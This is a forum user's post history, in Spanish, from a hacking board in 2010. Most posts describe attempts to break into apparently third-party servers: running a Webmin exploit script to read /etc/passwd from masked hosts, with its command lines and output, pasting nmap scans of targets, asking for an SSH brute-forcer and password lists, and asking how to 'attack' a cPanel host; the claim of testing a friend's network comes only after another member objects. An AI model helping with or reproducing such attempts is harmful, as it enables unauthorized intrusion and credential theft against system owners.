Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - jackaroe

#1
Pregunta desde la ignorancia, se puede actualizar desde una versión previa instalada en HD?
Creo que no, pero está en los planes algún día poder hacerlo o es un imposible?

//edit; me tomé el atrevimiento de subirlo a mega por si alguien quiere aprovecharlo, si no se puede lo pueden borrar, no hay problemas.

https://mega.co.nz/#!ChQnHRyJ!4WerH-OcmbtfPu3d0cI3ojUSZgI_G1qaxy-ZIr9v7D8
#2
Hacking / Re: Curiosidad con proxychains
6 Julio 2010, 21:56 PM
De tanto leer el tema me terminó interesando y me puse a leer sobre como dejar andando tor + polipo.
Y éste tutorial con precisamente el fichero que se adjunta (polipo.conf) me sirvió.

Ahora quiero dejar funcionando proxychains con namp también.:D
#3
Hacking / Re: webmin attack error
6 Julio 2010, 19:24 PM

[nube@GNU webmin]$ perl 2017.pl 2**.45.*.* 10000 /etc/passwd 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 2**.45.4*.** on port 10000!
FILENAME:  /etc/passwd

FILE CONTENT STARTED
-----------------------------------
<h1>Error - Bad Request</h1>
<pre>This web server is running in SSL mode. Try the URL <a href='https://server1.l***.**.**:10000/'>https://server1.***.**.**:10000/</a> instead.<br></pre>

-------------------------------------


:huh:

#4
Hacking / Re: webmin attack error
6 Julio 2010, 16:57 PM
antes que nada gracias a todos.:)

Si ejecuto el exploit en base a la IP recibo un:

[nube@GNU webmin]$ perl 2017.pl 2**.4*.44.** 10000 /etc/passwd 1
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 2**.4*.44.** on port 10000!
FILENAME:  /etc/passwd
Failed: 404 File not found


Por otro lado usaba la dirección completa porque es la cual desde donde se loguea el webmin. En mi caso:

https://server1.la****.***.ar:10000/




saludos
#5
Hacking / webmin attack error
6 Julio 2010, 05:15 AM
hola, estoy probando un exploit para webmin que cuando lo ejecuto recibo el siguiente error.

[nube@GNU webmin]$ perl 2017.pl https://server.xxxxxxx.xxxx 10000 /etc/passwd 1
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking https://server.xxxxxxxxx.xxxx on port 10000!
FILENAME:  /etc/passwd
Failed: 500 Can't connect to https::443 (Bad hostname 'https:')


nmap quick scan plus

Starting Nmap 5.21 ( http://nmap.org ) at 2010-07-06 00:10 ART

Nmap scan report for www.xxxxxxxxxxx.xxx (2**.45.xx.**)
Host is up (0.32s latency).
rDNS record for 2**.45.**:  server.xxxxxxxxxx.xxxx
Not shown: 92 filtered ports
PORT      STATE  SERVICE VERSION
21/tcp    closed ftp
22/tcp    closed ssh
53/tcp    open   domain  ISC BIND 9.5.0-P1
80/tcp    open   http    Apache httpd 2.2.8 ((Fedora))
110/tcp   open   pop3    Dovecot pop3d
143/tcp   open   imap    Dovecot imapd
873/tcp   closed rsync
10000/tcp open   http    MiniServ 0.01 (Webmin httpd)


Device type: general purpose|firewall|proxy server|WAP
Running (JUST GUESSING) : Linux 2.6.X|2.4.X (93%), ISS Linux 2.4.X (92%), Cisco Linux 2.6.X (88%), Riverbed embedded (88%), AVM embedded (87%), Netgear embedded (87%), Linksys embedded (87%)
Aggressive OS guesses: Blue Coat Director (Linux 2.6.10) (93%), Linux 2.6.18 (93%), Linux 2.6.5 (93%), Linux 2.6.9 - 2.6.27 (92%), ISS Proventia GX3002 firewall (Linux 2.4.18) (92%), Linux 2.6.9 (89%), Linux 2.4.20 (88%), Linux 2.6.18 - 2.6.28 (88%), Linux 2.6.24 (88%), Linux 2.6.29 (88%)
No exact OS matches for host (test conditions non-ideal).


Y no sé como demonios avanzar. :huh:
Ya instalé las librerías perl-crypt-ssleay y perl-net-ssleay y no sé que me puede estar faltando.

Desde ya agradezco cualquier ayuda.
#6
Gracias Sora! Muy buena info. ;)

por otro lado, conocen un SSH bruteforcer bueno? Encontré que el puerto 2222 se loguea como admin, pero claro, necesito pass y algún buen diccionario.

saludos
#7
Cita de: winroot en  3 Julio 2010, 03:37 AM
esto es un foro de hacking ético.
entrar a un sistema para hacer   desastres no es nada ético.

no, no no quiero romper nada, en serio, solo quiero aprender.;)

Cita de: DebciAlomejor es su propio servidor web, puede que este probando eso en una red cerrada.
exacto, estamos comprobando la seguridad de la red de un amigo.

Cita de: DebciPara web forms como ese que sugieres, puedes atacar con bruter-force, mira por Hydra o Medusa, sin embargo ese método es muy escandaloso y no es muy ecomendado no mas que en contadas ocasiones, lo suyo es mirar por alguna vulnerabilidad web de dicha aplicación, y buscar el exploit correspondiente.

milw0rm será tu consejero en estas ocasiones.
agradezco tu aporte, aunque milw0rm está caído? :s

#8
hola  a todos, soy nuevo aca y me registre porque me pico el bichito de la seguridad.

El tema es el siguiente, escanié una determinada IP y su direccion me pide login de cpanel.
***.direccion.com/controlpanel

hay manera de forzar un login o algo? ¿o estoy equivocando el camino?

Un scan de nmap además me arroja estos resultados.


Starting Nmap 5.21 ( http://nmap.org ) at 2010-07-02 18:55 ART
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Nmap scan report for www.xxxxxxxxxxxxxxxx.com **.120.**.251)
Host is up (0.19s latency).
rDNS record for **.120.**.251: fb.e9.78ae.static.th**********
Not shown: 976 closed ports
PORT     STATE    SERVICE
1/tcp    filtered tcpmux
3/tcp    filtered compressnet
4/tcp    filtered unknown
6/tcp    filtered unknown
7/tcp    filtered echo
9/tcp    filtered discard
13/tcp   filtered daytime
17/tcp   filtered qotd
19/tcp   filtered chargen
21/tcp   open     ftp
22/tcp   filtered ssh
25/tcp   filtered smtp
26/tcp   open     rsftp
53/tcp   open     domain
80/tcp   open     http
110/tcp  open     pop3
143/tcp  open     imap
443/tcp  open     https
465/tcp  open     smtps
646/tcp  filtered ldp
993/tcp  open     imaps
995/tcp  open     pop3s
2222/tcp open     unknown
3306/tcp open     mysql
Device type: WAP
Running: Linux 2.4.X
OS details: DD-WRT v23 (Linux 2.4.36)


perdon por la pregunta, pero como "ataco" el sistema de alguna manera, me ayudan?

saludos y grazias